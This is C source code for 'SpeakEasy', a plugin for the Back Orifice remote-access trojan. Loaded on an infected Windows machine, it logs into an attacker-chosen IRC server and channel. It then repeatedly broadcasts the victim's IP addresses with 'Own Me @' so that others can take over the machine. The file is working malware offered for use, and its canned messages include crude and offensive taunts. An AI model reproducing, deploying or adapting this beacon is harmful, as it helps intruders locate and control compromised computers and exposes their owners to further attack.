/////////////////////////////////////////////////////////////////
// SpeakEasy.c
//  A Back Orifice plugin -- used to announce to an IRC server the
//  location of a BO'ed user.
// Written by Brian Enigma <enigma@netninja.com>
/////////////////////////////////////////////////////////////////
// Be sure to link this with Wsock32.lib

// #define DEBUG_MODE

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "SpeakEasy.h"

int notifyLoop(char *message1, char *message2);
void buildOwnedMessage(char *ownedMessage, char *customMessage, char *channel);
int announce(void);
int connectToServer(char *host, unsigned int port);
int Send( SOCKET s, const char *lpszBuff, int nLen, int nFlags );
int Receive( SOCKET s, LPTSTR lpszBuff, int nLenMax, int nFlags,
			  LPCTSTR lpszReplyCode );
void myIP(char *result);


////////////////////////////////////////////////////////////////
// Variables
char	inBuffer[513] = "";		//The incoming text
int		inBufferInUse = 0;		//Simplistic Locking
SOCKET	s;						//The socket handle
char	globalHost[255];		// \   These are the connection
unsigned int globalPort;		//  >  parameters passed
char	globalMessage[255];		// /
int		*globalActive;			// Does BO need to shut down?

//Defines
#define HOST				"10.10.4.49"
#define CHANNEL				"#BO_OWNED"
#define PORT				6667
#define PAUSE_INTERVAL		120

const char customMessage[][80]={"DEAD COW!",
								"BO ButtPlugs and goodies...http://www.netninja.com/bo.html",
								"AJ Reznor: The pierced, tattooed grand master god of flame wars!",
								"Get raped!",
								"Who is John Galt?",
								"Yes, you too can own my box with this special introductory offer of $0.00!",
								"I'm sad to see Kontrol Faktory go away...",
								"Use Linux!",
								"This box is now property of the Illuminati.",
								"<<tap>> <<tap>> <<tap>>...Is this thing on?",
								"Where do *YOU* want to go today?!"
							};

////////////////////////////////////////////////////////////////
// For logging/debugging the DLL on the remote server
#ifdef DEBUG_MODE
void logAction(char *message)
{
	FILE *f;
	f = fopen("c:\\se.log", "at");
	if (!f)
		return;
	fprintf(f, "%s\n", message);
	fclose(f);
//	printf(message);
}
#else
__inline void logAction(char *message)
{
	return;
}
#endif

////////////////////////////////////////////////////////////////
// For logging/debugging the DLL on the remote server
#ifdef DEBUG_MODE
void logActionNumber(int number)
{
	FILE *f;
	f = fopen("c:\\se.log", "at");
	if (!f)
		return;
	fprintf(f, "%d\n", number);
	fclose(f);
//	printf(message);
}
#else
__inline void logActionNumber(int number)
{
	return;
}
#endif

/////////////////////////////////////////////////////////////////
// announce - sends an SMTP mail message to specified host. This
// is the only exported function from this DLL.
int announce(void)
{
	WORD    wVersion = MAKEWORD( 1, 1 );
	WSADATA wsaData;
	int     nRet;
	char    ownedMessage[513];
	char    customMessage[513];
	int seconds;

	logAction("Opening Winsock");
	if (WSAStartup(wVersion, &wsaData))
	    return 1;

	buildOwnedMessage(ownedMessage, customMessage, CHANNEL);

	//Connect to the server, retrying every five minutes if the user is not
	// live on the net.
	logAction("Connecting to server");
	do{
		nRet = connectToServer(globalHost, globalPort);
		if (nRet==0) break;
		for (seconds = 0; seconds < 60 * 5; seconds++)
		{
			Sleep(1000 * 60 * 5);
			if (! *globalActive)
			{
				WSACleanup();
				return 0;
			}
		}
	}while (nRet != 0);
	// Main broadcast loop
	if (!nRet)
	{
		logAction("Announce loop");
		nRet = notifyLoop(ownedMessage, customMessage);
	}

	// Cleanup socket lib
	WSACleanup();

	return nRet;
}

/////////////////////////////////////////////////////////////////
void buildOwnedMessage(char *ownedMessage, char *customMessage, char *channel)
{
	strcpy(ownedMessage, "NOTICE ");
	strcat(ownedMessage, channel);
	strcpy(customMessage, ownedMessage);
	strcat(ownedMessage, " :Own Me @ ");
	myIP(ownedMessage);
	strcat(customMessage, " :");
	strcat(customMessage, globalMessage);
	strcat(customMessage, "\r\n");
	strcat(ownedMessage, "\r\n");
}

/////////////////////////////////////////////////////////////////
int connectToServer(char *host, unsigned int port)
{
	char buffer[513];

	struct hostent    *ph;
	struct sockaddr_in addr;
	char userName[10];
	int i;

	// connect to the remote host
	if( (s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
		return WSAGetLastError();

	if( isdigit(host[0]) && strchr(host, '.') )
		{
		unsigned long iaddr = inet_addr( host );
		ph = gethostbyaddr( (const char *)&iaddr, 4, PF_INET );
		}
	else
		ph = gethostbyname( host );

	if( ph == NULL )
		return WSAGetLastError();

	addr.sin_family = AF_INET;
	addr.sin_port   = htons(port);
	memcpy( &addr.sin_addr, ph->h_addr_list[0],
			sizeof(struct in_addr) );

	if( connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr)) )
		return WSAGetLastError();

	strcpy(userName, "BO_");
	for (i=0; i<6; i++)
		userName[i+3] = (rand() % 26) + 'A';
	userName[9] = 0;

	//Log into the server and channel
	strcpy(buffer, "NICK ");
	strcat(buffer, userName);
	strcat(buffer, "\r\n");
	Send(s, buffer, strlen(buffer), 0);
	strcpy(buffer, "USER ");
	strcat(buffer, userName);
	strcat(buffer, " host server :Owned ");
	strcat(buffer, userName);
	strcat(buffer, "\r\n");
	Send(s, buffer, strlen(buffer), 0);
	Send(s, "JOIN #BO_OWNED\r\n", 16, 0);
	return 0;
}

/////////////////////////////////////////////////////////////////
int notifyLoop(char *message1, char *message2)
{
	int seconds;
	Sleep(5000);
	Send(s, "NOTICE #BO_OWNED :Psssst...Speakeasy just started up\r\n", 54, 0);
	while(1)
	{
		Send(s, "PONG\r\n", 6, 0);					//Send an extra PONG, just in case we were
													//  pinged
		Send(s, message1, strlen(message1), 0);	//IP Address
		Send(s, message2, strlen(message2), 0);	//Custom Message
		for(seconds=0; *globalActive && (seconds < PAUSE_INTERVAL); seconds++)
			Sleep(1000);
		if (! *globalActive)
			break;
	}
	Send(s, "QUIT :Psssst...Speakeasy was told to shut down\r\n", 48, 0);
	return 0;
}

/////////////////////////////////////////////////////////////////
// Send - send the request to the server and handle errors.
int Send( SOCKET s, const char *lpszBuff, int nLen, int nFlags )
{
	int nCnt = 0;

	logAction((char *)lpszBuff);

	while( nCnt < nLen )
		{
		int nRes = send( s, lpszBuff + nCnt, nLen - nCnt, nFlags );
		if( nRes == SOCKET_ERROR )
			return WSAGetLastError();
		else
			nCnt += nRes;
		}

	return 0;
}

/*
/////////////////////////////////////////////////////////////////
// Receive - receive a reply from the SMTP server, and verify that
// the request has succeeded by checking against the specified
// reply code.
int Receive( SOCKET s, LPTSTR lpszBuff, int nLenMax, int nFlags,
			  LPCTSTR lpszReplyCode )
{
	LPTSTR p;
	int    nRes = recv( s, lpszBuff, nLenMax, nFlags );

	if( nRes == SOCKET_ERROR )
		return WSAGetLastError();
	else
		*( lpszBuff + nRes ) = '\0';


	// check reply code for success/failure
	p = strtok( lpszBuff, "\n" );
	while( p )
		{
		if( *(p + 3) == ' ' )
			{
			if( !strncmp(p, lpszReplyCode, strlen(lpszReplyCode)) )
				return 0;
			else
				{
				int nErr = 1;

				sscanf( p, "%d", &nErr );
				return -nErr;
				}
			}
		else
			p = strtok( NULL, "\n" );
		}

	return -1;
}
*/

/*
/////////////////////////////////////////////////////////////////
int messagePumpThread(void)
{
	char buffer[513];
	int  maxLen;
	int nRes;
	int result;
	int i;
	
	//Receive any waiting data
	maxLen = 513;
	memset(buffer, 0, sizeof(buffer));
	nRes = recv(s, buffer, maxLen, 0);
	if( nRes == SOCKET_ERROR )
	{
		result = WSAGetLastError();
		if (result==WSAEWOULDBLOCK)
			Sleep(500);
		else
			return WSAGetLastError();
	}else
		*( buffer + nRes ) = '\0';
	//Lock the input buffer
	for (i=0; i<5; i++)
	{
		if (inBufferInUse==0)
			break;
		else
			Sleep(100);
	}
	inBufferInUse=1;
	//Let's ignore it for now....as long as we throw out enough PONGS and NOTICEs, it
	// should be fairly happy.
	return 0;
}
*/

/////////////////////////////////////////////////////////////////
// myIP enumerates through the local machine's IP network interfaces
// and grabs each address.  They are stored in a preallocated buffer
// passed into the function.  Be sure you have enough space, or bad
// things may happen (Read: buffer overflows).  If there are more than
// 6 network interfaces in this machine (WOW!), then only the first
// six are returned.
//
void myIP(char *result)
{
	char dot[6];
	int iResult;
	int i = 0;
	u_long *ppIpNO;
	u_long *pIpNO;
	HOSTENT FAR *lphostent;
	u_long ipHO;
	unsigned char binIp[4];
	int iterations = 0;

	//Get local host name and crudely validate
	char szHostName[40];
	iResult = gethostname(szHostName, sizeof(szHostName));
	if ((iResult != 0) || (lstrcmp(szHostName, "")==0))
		return;

	//Lok up this host info via supplied name
	lphostent = gethostbyname(szHostName);
	if (lphostent == NULL)
		return;

	//Retreive first entry (might have multiple connects)
	do
	{
		iterations++;
		ppIpNO = (u_long *)lphostent->h_addr_list;
		if (ppIpNO+i == NULL)
			return;
		pIpNO = ((u_long *)*(ppIpNO+i));
		if (pIpNO == NULL)
			return;

	//convert back to host order, since SOCKADDR_IN expects that
		ipHO = ntohl(*pIpNO);

		binIp[0] = (BYTE)((ipHO & 0xff000000) >> 24);
		itoa(binIp[0], dot, 10);
		strcat(result,dot);
		binIp[1] = (BYTE)((ipHO & 0x00ff0000) >> 16);
		itoa(binIp[1], dot, 10);
		strcat(result, "."); strcat(result, dot);
		binIp[2] = (BYTE)((ipHO & 0x0000ff00) >> 8);
		itoa(binIp[2], dot, 10);
		strcat(result, "."); strcat(result, dot);
		binIp[3] = (BYTE)(ipHO & 0x000000ff);
		itoa(binIp[3], dot, 10);
		strcat(result,"."); strcat(result, dot);
		strcat(result,"  ");
		i++;
	} while ((pIpNO != NULL) && (iterations < 3));
	return;
}

/////////////////////////////////////////////////////////////////
// External entrypoint for the DLL.  All it does is parse the
// arguments into global variables, set a global pointer to the
// "active" parameter (so it can gracefully shut down if BO needs
// to shut down), then call the worker thread (not as a seperate
// thread, because odd things began to happen).
//

__declspec ( dllexport )	
	char * WINAPI start(int *active, char *args)
{
	char *p;
	int count;

	globalActive = active;
	memset(globalHost, 0, sizeof(globalHost));
	globalPort = 0;
	memset(globalMessage, 0, sizeof(globalMessage));
	srand( (unsigned)time( NULL ) );
	
	//Parse the arguments
	logAction("Parsing Arguments:");
	logAction(args);
	//Snag the host address
	for(p = args, count=0; p && (*p) && (*p!=':'); p++,count++)
		;
	if (count)
		strncpy(globalHost, args, count);
	//Snag the port number
	for (p++; p && (*p) && (*p!=':'); p++)
		if ((*p >= '0') && (*p <= '9'))
			globalPort = globalPort * 10 + *p - '0';
	if (p && *p)
	{
		p++;
		strcpy(globalMessage, p);
	}
	if (globalMessage[0] == 0)
		strcpy(globalMessage, customMessage[rand() % 11]);
	logAction(globalHost);
	logActionNumber(globalPort);
	logAction(globalMessage);

	logAction("Thread starting");
	announce();
	return NULL;
}

/////////////////////////////////////////////////////////////////
// DllMain
BOOL WINAPI DllMain (HANDLE hModule, DWORD dwReason, LPVOID lpReserved)
{
	switch(dwReason)
	{
	case DLL_PROCESS_ATTACH:
		logAction("DLL Attached");
		globalActive = NULL;
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	default:
		break;
	}
	return TRUE;
}

/*
int main(void)
{
	int active = 1;
	globalActive = &active;
	srand( (unsigned)time( NULL ) );
	try{
		announce();
	}catch(...)
	{};
	return 0;
}
*/